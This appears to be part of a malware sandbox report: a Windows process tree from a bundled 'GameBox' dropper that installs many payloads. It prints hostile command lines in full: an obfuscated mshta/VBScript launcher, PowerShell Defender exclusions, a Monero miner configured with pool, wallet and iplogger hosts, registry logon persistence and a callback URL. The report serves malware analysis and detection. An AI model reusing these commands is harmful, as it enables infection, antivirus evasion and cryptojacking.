                                                                  "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                  6⤵
                                                                    PID:4512
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                      7⤵
                                                                        PID:6472
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                      6⤵
                                                                      • Loads dropped DLL
                                                                      PID:6760
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill -IM "drRX5aJPDKLqAEncATsyNLcD.exe" -f
                                                                    5⤵
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5476
                                                            • C:\Users\Admin\Documents\DC6QElJlJQv4wujWxGA7tZYv.exe
                                                              "C:\Users\Admin\Documents\DC6QElJlJQv4wujWxGA7tZYv.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2360
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "DC6QElJlJQv4wujWxGA7tZYv.exe" /f & erase "C:\Users\Admin\Documents\DC6QElJlJQv4wujWxGA7tZYv.exe" & exit
                                                                3⤵
                                                                  PID:5540
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im "DC6QElJlJQv4wujWxGA7tZYv.exe" /f
                                                                    4⤵
                                                                    • Kills process with taskkill
                                                                    PID:6076
                                                              • C:\Users\Admin\Documents\BUxtPux8wyrfGyNsP1cHUV8Q.exe
                                                                "C:\Users\Admin\Documents\BUxtPux8wyrfGyNsP1cHUV8Q.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1276
                                                              • C:\Users\Admin\Documents\WBBD9LtANQ4N4OOpBHW7u0UB.exe
                                                                "C:\Users\Admin\Documents\WBBD9LtANQ4N4OOpBHW7u0UB.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1204
                                                              • C:\Users\Admin\Documents\6NTEy0M42XXJIft21ensMOe7.exe
                                                                "C:\Users\Admin\Documents\6NTEy0M42XXJIft21ensMOe7.exe"
                                                                2⤵
                                                                  PID:804
                                                                  • C:\Users\Admin\Documents\6NTEy0M42XXJIft21ensMOe7.exe
                                                                    "C:\Users\Admin\Documents\6NTEy0M42XXJIft21ensMOe7.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:2652
                                                                  • C:\Users\Admin\Documents\6NTEy0M42XXJIft21ensMOe7.exe
                                                                    "C:\Users\Admin\Documents\6NTEy0M42XXJIft21ensMOe7.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1420
                                                                • C:\Users\Admin\Documents\vuWY8YhkMYt4BEv4QMMQ7jUu.exe
                                                                  "C:\Users\Admin\Documents\vuWY8YhkMYt4BEv4QMMQ7jUu.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:4112
                                                                  • C:\Users\Admin\Documents\vuWY8YhkMYt4BEv4QMMQ7jUu.exe
                                                                    "C:\Users\Admin\Documents\vuWY8YhkMYt4BEv4QMMQ7jUu.exe" -q
                                                                    3⤵
                                                                      PID:2208
                                                                  • C:\Users\Admin\Documents\C9OW3mdrAxl61gtUhAtRIU_l.exe
                                                                    "C:\Users\Admin\Documents\C9OW3mdrAxl61gtUhAtRIU_l.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:4296
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\C9OW3M~1.DLL,s C:\Users\Admin\DOCUME~1\C9OW3M~1.EXE
                                                                      3⤵
                                                                      • Blocklisted process makes network request
                                                                      • Loads dropped DLL
                                                                      PID:7448
                                                                      • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\C9OW3M~1.DLL,Yis3c1o=
                                                                        4⤵
                                                                        • Blocklisted process makes network request
                                                                        • Loads dropped DLL
                                                                        • Checks processor information in registry
                                                                        • Modifies system certificate store
                                                                        PID:5116
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\C9OW3M~1.DLL
                                                                          5⤵
                                                                            PID:6096
                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\C9OW3M~1.DLL,rVxQRg==
                                                                            5⤵
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of SetThreadContext
                                                                            • Checks processor information in registry
                                                                            PID:8880
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                                                              6⤵
                                                                                PID:9188
                                                                                • C:\Windows\system32\ctfmon.exe
                                                                                  ctfmon.exe
                                                                                  7⤵
                                                                                    PID:6788
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp5905.tmp.ps1"
                                                                                5⤵
                                                                                  PID:6164
                                                                          • C:\Users\Admin\Documents\_i2mLmQdEMhM7EScgqI8K4iU.exe
                                                                            "C:\Users\Admin\Documents\_i2mLmQdEMhM7EScgqI8K4iU.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:4368
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-ND0QB.tmp\_i2mLmQdEMhM7EScgqI8K4iU.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-ND0QB.tmp\_i2mLmQdEMhM7EScgqI8K4iU.tmp" /SL5="$2027E,138429,56832,C:\Users\Admin\Documents\_i2mLmQdEMhM7EScgqI8K4iU.exe"
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:4460
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-LK0IK.tmp\Setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-LK0IK.tmp\Setup.exe" /Verysilent
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            PID:3956
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:5836
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-BSA4I.tmp\Stats.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-BSA4I.tmp\Stats.tmp" /SL5="$10366,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:5932
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-DC957.tmp\builder.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-DC957.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                                  5⤵
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:7080
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5856
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 748
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Program crash
                                                                                PID:5976
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 772
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:7872
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 676
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:6756
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 812
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:4308
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1056
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:4340
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1072
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:6776
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1096
                                                                                4⤵
                                                                                • Program crash
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:6000
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1136
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:3976
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:5876
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-JKEUI.tmp\Inlog.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-JKEUI.tmp\Inlog.tmp" /SL5="$10380,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:6044
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-OFLO1.tmp\Setup.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-OFLO1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                  5⤵
                                                                                    PID:5588
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-33RE5.tmp\Setup.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-33RE5.tmp\Setup.tmp" /SL5="$50346,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-OFLO1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                      6⤵
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in Program Files directory
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:7808
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-7SVV8.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                        7⤵
                                                                                          PID:708
                                                                                          • C:\Windows\SysWOW64\expand.exe
                                                                                            expand C:\Users\Admin\AppData\Local\Temp\is-7SVV8.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                            8⤵
                                                                                            • Drops file in Windows directory
                                                                                            PID:5672
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                          7⤵
                                                                                            PID:1184
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                              8⤵
                                                                                                PID:6468
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-7SVV8.tmp\{app}\vdi_compiler.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-7SVV8.tmp\{app}\vdi_compiler"
                                                                                              7⤵
                                                                                                PID:9968
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                7⤵
                                                                                                  PID:7384
                                                                                                • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                  "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                  7⤵
                                                                                                    PID:9220
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:6100
                                                                                            • C:\Users\Admin\AppData\Roaming\6894827.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\6894827.exe"
                                                                                              4⤵
                                                                                                PID:5760
                                                                                              • C:\Users\Admin\AppData\Roaming\3947018.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\3947018.exe"
                                                                                                4⤵
                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                PID:4916
                                                                                              • C:\Users\Admin\AppData\Roaming\5927206.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\5927206.exe"
                                                                                                4⤵
                                                                                                  PID:6828
                                                                                                • C:\Users\Admin\AppData\Roaming\5648275.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\5648275.exe"
                                                                                                  4⤵
                                                                                                    PID:6840
                                                                                                  • C:\Users\Admin\AppData\Roaming\4758023.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\4758023.exe"
                                                                                                    4⤵
                                                                                                      PID:4384
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                    3⤵
                                                                                                      PID:6124
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                        4⤵
                                                                                                          PID:6356
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                        3⤵
                                                                                                          PID:6024
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-HF4M6.tmp\VPN.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-HF4M6.tmp\VPN.tmp" /SL5="$3037A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:5356
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-6O241.tmp\Setup.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-6O241.tmp\Setup.exe" /silent /subid=720
                                                                                                              5⤵
                                                                                                                PID:6436
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-OKE6G.tmp\Setup.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-OKE6G.tmp\Setup.tmp" /SL5="$304B8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-6O241.tmp\Setup.exe" /silent /subid=720
                                                                                                                  6⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Modifies system certificate store
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  PID:7364
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                    7⤵
                                                                                                                      PID:7588
                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                        tapinstall.exe remove tap0901
                                                                                                                        8⤵
                                                                                                                          PID:8620
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                        7⤵
                                                                                                                          PID:6468
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            8⤵
                                                                                                                              PID:8724
                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                              tapinstall.exe install OemVista.inf tap0901
                                                                                                                              8⤵
                                                                                                                                PID:8480
                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                              7⤵
                                                                                                                                PID:8208
                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                7⤵
                                                                                                                                  PID:9144
                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                          3⤵
                                                                                                                            PID:5976
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-N9O7J.tmp\WEATHER Manager.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-N9O7J.tmp\WEATHER Manager.tmp" /SL5="$103A8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:4212
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-I37MK.tmp\Setup.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-I37MK.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                5⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Enumerates connected drives
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:5644
                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-I37MK.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-I37MK.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586628 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                  6⤵
                                                                                                                                    PID:3976
                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Enumerates connected drives
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:5920
                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586628 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                4⤵
                                                                                                                                  PID:9224
                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Checks computer location settings
                                                                                                                                PID:5248
                                                                                                                                • C:\Users\Admin\Documents\34Ke6ARX5umaghxokqhxMCdy.exe
                                                                                                                                  "C:\Users\Admin\Documents\34Ke6ARX5umaghxokqhxMCdy.exe"
                                                                                                                                  4⤵
                                                                                                                                    PID:4704
                                                                                                                                    • C:\Users\Admin\Documents\34Ke6ARX5umaghxokqhxMCdy.exe
                                                                                                                                      "C:\Users\Admin\Documents\34Ke6ARX5umaghxokqhxMCdy.exe"
                                                                                                                                      5⤵
                                                                                                                                        PID:6960
                                                                                                                                    • C:\Users\Admin\Documents\M3L_NuQporW39QVFAMB8cNKj.exe
                                                                                                                                      "C:\Users\Admin\Documents\M3L_NuQporW39QVFAMB8cNKj.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:6452
                                                                                                                                    • C:\Users\Admin\Documents\53eNKAuh7p8oKP03O2ng8D81.exe
                                                                                                                                      "C:\Users\Admin\Documents\53eNKAuh7p8oKP03O2ng8D81.exe"
                                                                                                                                      4⤵
                                                                                                                                        PID:4896
                                                                                                                                      • C:\Users\Admin\Documents\ajCPgoXv2p2k6AKROs1Gy1lp.exe
                                                                                                                                        "C:\Users\Admin\Documents\ajCPgoXv2p2k6AKROs1Gy1lp.exe"
                                                                                                                                        4⤵
                                                                                                                                          PID:6280
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "ajCPgoXv2p2k6AKROs1Gy1lp.exe" /f & erase "C:\Users\Admin\Documents\ajCPgoXv2p2k6AKROs1Gy1lp.exe" & exit
                                                                                                                                            5⤵
                                                                                                                                              PID:8648
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /im "ajCPgoXv2p2k6AKROs1Gy1lp.exe" /f
                                                                                                                                                6⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:8852
                                                                                                                                          • C:\Users\Admin\Documents\3_AqWgGamVbIgBc7B5Vmg2KW.exe
                                                                                                                                            "C:\Users\Admin\Documents\3_AqWgGamVbIgBc7B5Vmg2KW.exe"
                                                                                                                                            4⤵
                                                                                                                                              PID:6512
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1714900.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1714900.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:7172
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7866606.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7866606.exe"
                                                                                                                                                  5⤵
                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                  PID:3548
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3155757.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3155757.exe"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:7076
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3993177.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3993177.exe"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:6356
                                                                                                                                                  • C:\Users\Admin\Documents\id9Fyg36Irin5192xLjNgaGt.exe
                                                                                                                                                    "C:\Users\Admin\Documents\id9Fyg36Irin5192xLjNgaGt.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1424
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\ID9FYG~1.DLL,s C:\Users\Admin\DOCUME~1\ID9FYG~1.EXE
                                                                                                                                                        5⤵
                                                                                                                                                          PID:8356
                                                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\ID9FYG~1.DLL,pFtJ
                                                                                                                                                            6⤵
                                                                                                                                                              PID:7332
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\ID9FYG~1.DLL
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:5200
                                                                                                                                                          • C:\Users\Admin\Documents\GfZKQecFtvV6u1E8QwqRTG0g.exe
                                                                                                                                                            "C:\Users\Admin\Documents\GfZKQecFtvV6u1E8QwqRTG0g.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:5004
                                                                                                                                                            • C:\Users\Admin\Documents\GfZKQecFtvV6u1E8QwqRTG0g.exe
                                                                                                                                                              C:\Users\Admin\Documents\GfZKQecFtvV6u1E8QwqRTG0g.exe
                                                                                                                                                              5⤵
                                                                                                                                                                PID:7848
                                                                                                                                                            • C:\Users\Admin\Documents\m_zife3dyJNlNzRz9QPXX2Zw.exe
                                                                                                                                                              "C:\Users\Admin\Documents\m_zife3dyJNlNzRz9QPXX2Zw.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4736
                                                                                                                                                              • C:\Users\Admin\Documents\04XBs5C9bM2tF8pYbhEy7g3r.exe
                                                                                                                                                                "C:\Users\Admin\Documents\04XBs5C9bM2tF8pYbhEy7g3r.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4592
                                                                                                                                                                  • C:\Users\Admin\Documents\04XBs5C9bM2tF8pYbhEy7g3r.exe
                                                                                                                                                                    C:\Users\Admin\Documents\04XBs5C9bM2tF8pYbhEy7g3r.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:7836
                                                                                                                                                                  • C:\Users\Admin\Documents\PCnJkIx_dlldorwyzw16N2MH.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\PCnJkIx_dlldorwyzw16N2MH.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2208
                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\PCnJkIx_dlldorwyzw16N2MH.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\PCnJkIx_dlldorwyzw16N2MH.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
